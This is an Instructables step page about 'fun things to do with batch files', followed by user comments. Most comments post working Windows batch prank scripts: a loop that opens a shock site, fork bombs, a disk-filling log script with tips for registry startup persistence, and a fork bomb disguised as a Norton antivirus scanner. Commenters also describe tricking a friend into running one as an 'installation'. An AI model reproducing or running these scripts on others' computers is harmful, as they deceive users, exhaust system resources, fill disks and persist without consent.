3 Simple Ways to
Share What You Make

With Instructables you can share what you make with the world — and tap into an ever-growing community of creative experts.

PhotosPhotos

Share one or more photos of a project, recipe, or whatever you've made, quickly and easily.

Step by StepStep-By-Step

Share your step-by-step photos with text instructions of what you made so others can do it too!

VideoVideo

Share your how-to video. You'll need your embed code from a video site such as YouTube.

fun things to do with batch files

Step 4Just a reminder

AGAIN: SEND ANY IDEAS FOR A NEW BATCH RELATED (hell, any idea is good, even non batch) INSTRUCTABLE AND I WILL PUBLISH IT (batch preferred though, im really good at that and will get done faster). AGAIN, YOUR NAME WILL BE MENTIONED :D

Dead line is august 27nd. no entries accepted on the 28th.

send ideas here with subject line batch idea:

g_colonna@sympatico.ca

thanks for reading!

~PaRaDoX / Kerpaul (to clarify for those who didn't read my second, yes i'm both of these people.)
« Previous StepDownload PDFView All StepsNext Step »
13 comments
Apr 26, 2010. 11:55 AMwinegums says:
 try this one

@echo off
start www.meatspin.com

or if your feeling particularly mean

@echo off
:A
start www.meatspin.com
goto A


this will open meatspin in an infinite loop.

note: the website can be substituted for one of your own choice if you wish :)
Mar 24, 2012. 3:21 AMjlanejr says:
I just joined the site on the advice of my friend and saw your posting. Well what can i say? Meat spin kinda sparked my curiousity. So I googled it and could not closed the browser quick enough. Never the less I have to admit it was horrible. I will use the site for my own fiendish plots. LOL Thanks!!!!
Sep 28, 2010. 7:34 AMmessmaker says:
want to get any noober?
May 1, 2010. 1:44 AMdawsonj says:
i wont even comment on that...
Dec 15, 2011. 11:23 PMKingfisher111 says:
Meat Spin makes me sick
Mar 3, 2009. 12:52 AMV1P says:
use this one : The most annoying one that I made when I was in college :) @echo off :lbl start goto lbl Hv Fun >:P !
Jul 22, 2009. 8:07 PMnoobererer says:
HAHAHAHA I WIN! i figured out how to get out of it without shutting down! i just open the file, then hit ctrl + c rapidly for like 5 secs (idk if its needed) then held ctrl + c and they would pretty much close as fast as they oppen then u just have to exit the first window that popped up (while holding ctrl +c)
Jul 23, 2009. 8:40 AMV1P says:
Nice... but after how many tries u did this :) ? But yes anyways, it's just a prank, u can close all the cmd windows if your taskmgr is open. No harm in actual is done with this :) nice go noobererer :)
Dec 7, 2009. 9:56 AMuberdum05 says:
Ah, but you're wrong there, if it makes a copy of itself and opens the copy of itself. You're system will crash double quick now.......
(muhahahaha!)
Jul 24, 2009. 6:56 PMnoobererer says:
second try :P GO ME! lol yeh but no matter who u do this too it will have atleast like 50 windows open before they manage to stop it :P
Jul 8, 2010. 11:59 PMV1P says:
hmm ... there are other load of pranks I hv made, will post 'em later on, hv been busy in my stupid daily job :'(
Jul 9, 2010. 8:28 PMnoobererer says:
Sweet! Can't wait to see 'em :)
May 9, 2009. 7:06 PMkarmakid732 says:
that ones annoying as hell i just did it on my computer and had to restart it is there any cure besides shutting down
Mar 12, 2009. 9:43 PMghostWolf59 says:
Here's a better one that will turn the most powerful PC into a sluggish 286 as well as filling up the local hard disk :) @echo off echo 0 >> dump.log %0 he, he, he
Mar 17, 2009. 3:10 AMV1P says:
Nice :)
Aug 30, 2009. 4:55 AMknex_mepalm says:
what does that do? Looks good, but i'm in no way to test it
Aug 30, 2009. 5:41 PMghostWolf59 says:
indefinite loop that sends out "0" to an ever growing log file
Sep 1, 2009. 4:03 AMknex_mepalm says:
i wanna prank my friend how long would the process take and how would the windows and such work?
Sep 1, 2009. 5:59 PMghostWolf59 says:
if you look closely at the script you'll notice its only sending out one character to the log followed by appending another character to the log (i.e its now two characters) and so on... The time it will take all depends on the size of the hard disk. Also note the if the disk is formatted with fat32 this will only work up to 4Gb. If the hdd is formatted using NTFS the limit is 16Tb. The thing to do is to add this little script to the windows startup of even add a registry entry to the "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run" (Please do NOT hack your registry unless you know exactly what you do - you may damage your system for good) (You can also add a shortcut that minimizes the the terminal window. As some other posts suggested - its really simple to end this task off by hitting CTRL-D so don't expect to much out of this.
Sep 2, 2009. 3:41 AMknex_mepalm says:
lol i told him it was an installation, but how would it show up as? a cmd with 0s?
Feb 11, 2011. 4:41 PMtigger888 says:
Thats why you make

@echo off
start tryandclosethis.bat
exit

have fun trying to end task this...
Sep 1, 2009. 5:42 PMghostWolf59 says:
I am not here to spread viruses or damaging forks ! As the title clearly states "fun things to do with batch files" the aim was to create some fun with bat files. If you are looking for damaging stuff I suggest you search some other warez posts on the web - this forum is definitely the wrong one.
Mar 17, 2009. 3:15 AMV1P says:
No offence 2 u mate 2 ! It's just a batch script , having 3 lines of code not a virus, so it can't be a FORK Bomb at all..., but is well enough to annoy you when a hoard of cmd screens pop-up in front of you, which can't be closed by pressing down Alt+F4. also, try switching on your taskmgr after executing this batch script, then I guess that it'll be pretty difficult to even bring up taskmgr at all. & even if it comes up, terminating all the cmd's will be a tedious task. It's just for fun & is not meant to do any harm to anyone... :P Though if you want fork bombs, then those also can be made... but with not 3 lines of code ... :)
Mar 26, 2009. 10:05 AMV1P says:
??????? wht was tht ?
May 6, 2011. 8:11 PMdarman12 says:
Meaning the number of windows opening increases at an exponential rate.
Oct 31, 2008. 10:44 AMtwitch2009 says:
net user /active no|yes -to disable and enable accounts and net user (username) (password)
Jul 22, 2009. 8:08 PMnoobererer says:
can u post something on website hacking then?
May 25, 2009. 4:14 AMerikals says:
i made a batch file that is a fork bomb but it pretends to be a harmless antivirus app. Here's the code if any one is interested: @echo off echo Norton AV v1.99 (build 33) echo. echo Welcome to Norton Anti-Virus. echo This helpful application echo will search and destroy echo any cruel virus that may echo be lurking on your computer. echo Please press any key to start scanning. pause goto forkbomb :forkbomb start goto forkbomb Copy this into notepad and paste it. Also if any one could give me ideas on how to make it more real that would be appreciated.
Oct 31, 2008. 10:46 AMtwitch2009 says:
to make a batch file create accounts use this code for ex.

@echo off
echo
color 0a
echo
echo new user=1
echo
echo *_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*
echo
echo *_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*
echo
echo
echo
echo
set 1.New user
echo
echo
echo
set/p=%udefine%
echo
echo

Pro

Get More Out of Instructables

Already have an Account?

close

All Steps Viewing
View all steps of an Instructable on the same page when you're a Pro Member.

Upgrade to Pro today!
6
Followers
3
Author:kerpaul